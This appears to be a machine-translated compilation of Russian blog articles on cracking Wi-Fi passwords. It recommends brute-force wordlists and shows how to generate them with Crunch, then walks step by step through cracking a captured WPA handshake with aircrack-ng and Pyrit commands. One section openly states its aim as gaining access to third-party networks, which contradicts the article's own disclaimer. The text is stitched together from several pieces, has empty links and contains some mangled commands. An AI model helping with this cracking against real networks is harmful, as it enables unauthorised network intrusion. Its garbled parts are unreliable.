Hello! This will be a companion article to my main wireless security series. I will dedicate it to the selection of Wi-Fi password databases. Only the most useful, without excess water.
You may disagree with my opinion on many points - comments are always open for discussion. Helping each other is encouraged.
This article has been prepared solely for the purpose of improving personal information security skills. The WiFiGid project is categorically against the use of information on other people's networks without the prior consent of their owners. Let's live together and not harm other people!
Layer of theory for introduction
The bases themselves will be lower. Here I could not resist and I will try to identify the existing problems in Wi-Fi brute methods. What are the approaches in this direction?
- Classic brute force on the fly - i.e. trying to connect to access points and immediately check passwords. The method has sunk into oblivion, do not use this anachronism!
- Handshake interception and its brute in the same Aircrack - Hashcat is the most working technique that allows you to use all the power of your computer. I hope that's what you came here for.
- Brute WPS - also has a place to be, but the second method is used more often.
What thought is important to us on the second point of the problem:
Passwords come in different lengths. Do not use bases without considering their purpose.
Here are some of my thoughts:
- Starting with WPA, there are no passwords shorter than 8 characters. Those. anything below is useless. Of course, if you are unlucky enough to find a WEP network.
- People very often use numbers in their passwords - phone numbers and dates.
- You can find popular leaked passwords, for example, from emails - home passwords for hotspots will also match. That is, it makes sense to run through popular password lists (of course, longer than 8 characters).
- And if nothing else helps, you can use a full enumeration. There are already ready-made bases, but I myself prefer to use the Crunch generator - set any conditions YOU NEED, and get a ready-made base.
When using the head, the probability of successful password guessing increases exponentially.
Current bases
We figured out the theory, it's time to give ready-made bases. If you have something of your own - throw it in the comments with explanations. Comments on moderation, not everything will pass, rubbish is not needed here.
What is available and usable, the most popular password dictionaries in Russia and the CIS (dic and txt format - all text files):
- TOP Wi-Fi passwords for WPA, WPA2, WPA3
- TOP 9 million
- Password list E-mail
- Dates and birthdays
- Phones - Russia - Ukraine - Belarus
- 8 digits
- 9 digit numbers
Alternatives
Here I will leave a few alternative options for guessing passwords. And suddenly it is useful to the reader:
- You can use programs for generating - Crunch and John the Riper - allows you to create bases for your specific ideas. But as a rule, sorting through continuous generics, even on ultra-modern hardware, is a very long time.
- There are online services (I don’t give it, because there are also villains) that have already deciphered many handshakes or will take on their decryption - obviously for a fee, but sometimes it’s worth it.
Dictionaries Kali
These hacking dictionaries are already present in any Kali Linux user. So feel free to use and do not download anything. Below is a list with a few explanations. But what was above is quite enough for normal work with varying degrees of success.
- RockYou (/usr/share/wordlists/rockyou) is the most popular pentest dictionary for any business. It can also be used for Wi-Fi, but I recommend that you first clean up inappropriate passwords through the same pw-inspector.
That's all. If you have something to offer - throw it in the comments below. Let's see, we'll figure it out, but without the rubbish.
About dictionaries for aircrack -ng .
The first thing you should know is that ABSOLUTELY ALL the actions given in such articles without a VERY good dictionary (for the utility aircrack including), when hacked password, which includes an infinite number of possible password combinations , not more than rat race. So I warn you right away: all your manipulations may turn out to be meaningless if the user happens to use an arbitrary combination of the type when protecting his wireless access point:
... which is achieved simply by the user's senseless "knocking" on the keyboard. The method of decrypting an AP with WEP, WPA, WPA2 encryption classes considered here is based on a brute-force attack, that is, dictionary search. Alas, this is the problem of such methods: a dictionary must contain among the others the password invented by the victim. What is the probability that the dictionary you downloaded or compiled will contain the combination presented above? The netmask is unknown, you will have to brute force blindly.
Nor aircrack-ng alone are the hackers alive. The password, and not only from Wi-Fi, can be found in other ways. Read and meet:
Without any dictionary - in any way. Alas and ah. I warn you in advance - avoid old foreign dictionaries dating back to 2010. The network is full of them, and they are equally useless, and you yourself will understand this. As for the author of the article, he was rarely let down by a single dictionary. There is only one problem for you - only the archive for the “dictionary” of the txt format weighs about 14 GB. By the way, this is a bit more. A cosmic number of keyboard combinations is generated there, they are filtered by the most common ones; maybe your password will appear. It would be superfluous to remind you that files of this size should be downloaded separately, not as part of other downloads and with closed browsers. It would be a shame, after a long time, when trying to open a password document, encounter an opening error. Will have to download again...
So, let me explain how it works. If there are other options for WEP, there are a lot of utilities for cracking WEP passwords in Kali, then in the case of more powerful protection like WPA2 (today the most common type of protection), only the option with a dictionary or brute force is possible (including in our case). Hacking WiFi with airodump will be possible only in this way and not otherwise. This is the only but significant disadvantage of the method. The same applies to other methods of enumeration and substitution of the password available in the dictionary.
“Official” dictionaries for aircrack
There are no basic requirements for them. View - a text document, compiled according to the principle of 1 password in 1 line with line wrapping. The presence of Latin letters of both cases, Arabic numerals and several symbols.
Dictionaries for aircrack - where to get?
If you want to use ready-made dictionaries for aircrack, which have no advantages over more modern ones, then I will send you to the official site again:
http://www.aircrack-ng.org/
on the page of which these same dictionaries for aircrack are ready for download in links to third-party resources. All in all, take a look. You will visit this site anyway, trying to find dictionaries for aircrack on the net.
Further. The network is full of other suitable dictionaries that duplicate each other. A lot of "hackers" work like that - renamed someone else's, God forbid, diluted it with your own, packed it - you're done. Nobody is immune from this. So you'll have to search.
The next problem with foreign dictionaries is that the highest quality of them are compiled according to the method “what passwords they learned, they were added to the list”. There is only one problem for us - in Russia, passwords are usually created in a different way. So even the best dictionary of keys for 300 million commercials may well “refuse” you after 9-12 hours of waiting.
The main problem, as already mentioned, is the size of dictionaries. There are real masterpieces on the net. Almost all of them are from across the ocean. However, even psychologists and other specialists participated in their construction (according to the authors), trying to reproduce the most frequent random character sets like “monkey on the piano”. After all, coming up with the best password is:
- open notepad
- close eyes
- hit the keyboard with all 10 fingers at once
- dilute the password with characters like @, #, $, etc., screwing in an uppercase letter at the end. This is not “qwerty” for you ...
- the resulting copy and use as a password. You won’t be able to remember, but it will take a hacker 150 years to crack.
Dictionaries for aircrack - compose yourself.
I will be brief. Let's use the utility included in the Kali Crunh. Designed to generate random passwords, it has a number of useful settings. Some of them are very useful if, for example, you managed to see part of the victim's password. That is, you know some of the characters.
The generation process is simple. Launch the terminal and enter the command in the format:
crunch 7 8 -o /root/Desktop/dictThe command will create a dictionary called dict on the Desktop from all sorts of alphanumeric combinations, containing from 7 to 8 characters - a regular password. Convenient, right? And you don’t need to download any dictionaries for aircrack ... You rejoice early - take a closer look at the size:
Yes, yes, quite a bit - about 2 Terabytes. Pichalka (…
What to do? You can add commands to specify passwords if you have a reason to do so. So, the generation command can take the form:
crunch 7 8 9876543210 -o /root/Desktop/dict.lstwhere 9876543210 - exactly and only the symbols encountered in the future dictionary. And no more. Or:
In this case Crunch will create a dictionary with passwords #$ .
Many such dictionaries can be compiled, believe me, sometimes this method really works. They will not weigh so much, they will be mobile, they can be easily stored on external media. So, in the password selection command, you can then specify the passwords you created, separated by commas (if home-made dictionaries for aircrack are stored on the Kali desktop):
aircrack-ng /root/filename.cap -w /root/Desktop/dict1,dict2,dict3Again BUT
Using programs in a manner Crunch or John The Riper not quite the option that is useful to a professional cracker. There are several reasons for that. I was not able to work on the script in any way so that it would be possible to split the process of cracking the password combination into several stages (meaning from session to session, from one reboot to another). And this means that the hacking process can drag on for months. Against the background of a sharp drop in computer performance (I think, by half). And, in the end, as an option - a separate machine for brute force? An unaffordable luxury, in general. The most effective result was brought to me by working with a DUAL video card in 64-bit Windows 7. The process is described in the article.
Dictionaries for aircrack - online services.
It would be strange if such a person did not appear. However, for 3-4 years, the service, which includes the selection of passwords from a dictionary, already exists. It is located at:
It boasts of the shortest password decryption times and a dictionary of 600 million keys. I don't know any reviews about it because I haven't used it. Why? 17 US dollars per key (at the time of writing), however. You will need everything the same as in the case of the selection according to the available dictionary: you need to enter the BSSID of the victim, specify the path to .cap file and finally an email address. As I assume, they will first send you an answer about whether everything went well or not, and they will require you to pay. How, when, I don't know.
ATTENTION . Proceed at your own risk. If I were the creators of the resource, I could not resist and deceived anyone who wanted to transfer money to me just like that ... But I repeat: I don’t know, I didn’t use it. In any case, a link to this one is defined by many search engines as malicious. I had to delete it, but in the header of the site in the figure, the address is clearly visible. Who will use - unsubscribe
So, the best dictionary is not a panacea. Let's use another method:
Read: 6 338
Wifi brute dictionaries are often used by professional hackers in their work. Of course, you will also need specialized software, which is necessary for synchronization with the database of dictionaries.
But if the programs themselves can be easily downloaded from any open source, then you will have to look for good dictionaries for brute. Moreover, this is a rare and very valuable find on the Internet.
But if everything is clear to a professional without further ado, then for a less experienced audience, all this terminology is a curiosity. An ordinary user cannot understand why and for what purpose a wifi wpa2 brute may be required. How to use it and with what all this "is"?
What is brutus
Brute is one of the password cracking systems by selecting a key combination. Your computer will be able to pick up a password if you have the appropriate software and a database of dictionaries.Brute can be used almost anywhere where password protection is provided for the system. It can be a mailbox, a social page or something else.
We will talk in more depth about brute access to a wifi router. Our goal is to gain access to a third-party Internet connection. And this is where dictionaries, software and patience are required.
How to start brute wifi
Initially, it is worth distinguishing between the available router encryption protection systems - WPA and WPA2. In both cases, you can work with password generation, but it is the latter option for encrypting the system that is less desirable.The wifi wpa2 brute dictionary connects to software that automatically generates and searches for matches. This procedure is lengthy and can take at least several days. But again, it depends only on the complexity of the password itself.
But if you managed to download dictionaries from a reliable and proven database, then you can count on a positive final version.
Are all dictionaries the same?
Brutal wifi access should only be started if you clearly understand all the successive steps and stages that you have to overcome. The fact is that even brute wifi dictionaries are very different from each other and their use can not always be effective if you pick up the wrong base.Consider also the maximum number sequence in the dictionary you downloaded. Most often, users use 8 digits in a password, but there are dictionaries with a base password combination of 7-9 digits.
The wifi password dictionary should be adapted to your region. That is, there are separate bases in English, Spanish, French and other languages. In our case, we need a database of Russian password combinations.
Before synchronizing dictionaries, do not be too lazy to view them in a text editor and make sure that they are compiled at the right level and cover most popular combinations.
Hacking access to wifi from the phone screen
Implement wifi brut with android smartphone quite realistic, since the corresponding software is available for free and you can download it without restrictions. And further after installation, you will need to use all the same dictionaries, where you will probably pick up a unique password combination.The best dictionaries on the web
It is we who have collected the best dictionary databases for the subsequent selection of a password and brute wifi. You can easily make sure of this - download our dictionaries to your computer and try them out.The presented dictionaries have one of the largest databases of combinations of password options for Russian requests. And the dictionaries themselves are constantly improved and supplemented, which is important for new users.
Download dictionaries for WiFi brute (wpa, wpa2)
- :
- :
- [Dates in various spellings]:
- [A small dictionary of 9 million words]:
- [Passwords of emails leaked in 2014]:
Benefits of Using Pyrit
Cracking captured handshakes is the only way to crack WPA/WPA2 passwords. It is produced by the brute-force method (password brute force).
By the way, if you are not yet familiar with the technique of capturing handshakes, then refer to the article "".
Since the use of brute force does not guarantee a positive result, several techniques have been invented that can significantly increase the chances of success. These include:
- use of video cards for password guessing (significantly increases the speed of enumeration)
- use of tables with pre-calculated hashes (increased speed + ability to reuse for the same access point, the ability to try dozens of handshakes from one access point in seconds)
- using good dictionaries (increases chances of success)
Pyrit can use all of these techniques, which is why it is the fastest WPA / WPA2 password cracker, or one of the top two along with oclHashcat.
Other programs also implement these techniques. For example, both oclHashcat and coWPAtty implement dictionary iteration. coWPAtty has hash precalculation (but no support for using graphics cards). oclHashcat allows you to use the power of video cards, but does not pre-calculate hashes. Looking ahead, I note that in oclHashcat it is possible to implement a preliminary calculation of hashes and use the received data repeatedly for one access point, to check several handshakes without increasing the time to calculate hashes, how to do this will be described later. Aircrack-ng iterates over a dictionary and makes efficient use of multi-core processors, but does not use other "speedups".
On my system oclHashcat brute-forces to crack WPA/WPA2 passwords at 31550 H/s and Pyrit calculates hashes at 38000-40000 PMKs. Further verification of handshakes takes less than a second. It can be seen from this that even when checking one handshake, we increase the speed by about a third, and if we want to check several handshakes for one AP, then with oclHashcat we need to start all over again. In Pyrit, each new handshake takes a fraction of a second.
In order for Pyrit to unleash its full power, you must have the proprietary video card drivers installed. Look at the article "" and the material referenced in it - it explains step by step how to install drivers and Pyrit in Kali Linux 2 on a computer with a graphics card from AMD. You need to do all the steps, not just the last instruction. I don't have an NVidia computer, so I don't have up-to-date instructions on how to install the driver and Pyrit for NVidia based systems.
The fastest cracking WPA/WPA2 passwords
My initial data:
- attacked TD - DANIELLE2015
- the file, with the previously captured handshake, is called DANIELLE2015-01.cap
WPA/WPA2 Hacking Dictionary
I will be using the rockyou dictionary that comes with Kali Linux. For training, this is quite enough, but for practical attacks, I can recommend the generated dictionaries of phone numbers, generated dictionaries for specific APs of the form AP_name + numbers, which fill the passphrase up to eight characters.
Let's copy the best dictionary file to the root directory.
Cp /usr/share/wordlists/rockyou.txt.gz .
Let's unpack it.
gunzip rockyou.txt.gz
Since the minimum WPA2 password is required to be 8 characters, let's parse the file to filter out any passwords that are less than 8 characters and more than 63 (actually, you can just skip this line, it's entirely up to you). So we will save this file as newrockyou.txt.
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
Let's see how many passwords this file contains:
Wc -l newrockyou.txt
It contains as many as 9606665 passwords.
The original file contains even more.
Wc -l rockyou.txt
There are 14344392 passwords. So we've made this file shorter, which means we can test the AP in a shorter amount of time.
Finally, let's rename this file to wpa.lst.
Mv newrockyou.txt wpa.lst
Create an ESSID in the Pyrit database
Now we need to create an ESSID in the Pyrit database
Pyrit -e DANIELLE2015 create_essid
WARNING: If there is a space in the AP name, such as “NetComm Wireless”, then your command will be something like this:
Pyrit -e "NetComm Wireless" create_essid
Great, we now have an ESSID added to the Pyrit database.
Importing a Dictionary into Pyrit
Now that the ESSID has been added to the Pyrit database, let's import our password dictionary.
Use the following command to import the pre-built wpa.lst password dictionary into the Pyrit database.
Pyrit -i /root/wpa.lst import_passwords
Create tables in Pyrit using batch process
It's easy, just type the following command
pyrite batch
Since this operation is performed on a laptop, I have 38000-40000 PMKs. This is far from the limit - desktop computers with a good graphics card will help you significantly increase the speed of these calculations.
You have to be careful how big your dictionary file is and how HOT your CPU and GPU are. Use additional cooling to avoid damage.
Hacking process with Pyrit
We will use a handshake attack using a database of precomputed hashes. After we completed all the necessary preparation steps, it became quite easy to launch the attack. Just use the following command to start the hack process.
Pyrit -r DANIELLE2015-01.cap attack_db
That's all. The whole process, including preliminary calculation of hashes, took several minutes. It took less than a second to traverse the entire database table to get the password, if present in the dictionary. My speed reached 6322696 PMKs. It is by far the fastest.
This takes seconds - so it's always worth using if no password is found.
Handshake attack with a dictionary in Pyrit without using precomputed tables
If you don't feel like creating a database, but want to mess around with the dictionary file directly (which is a lot slower), you can do the following:
Pyrit -r DANIELLE2015-01.cap -i /root/wpa.lst attack_passthrough
The speed of this method? 17807 PMKs per second. Much slower for my taste.
Cleaning up Pyrit and the database
Finally, if needed, you can remove your essid and clean up.
Pyrit -e DANIELLE2015 delete_essid
This will free up quite a lot of disk space.
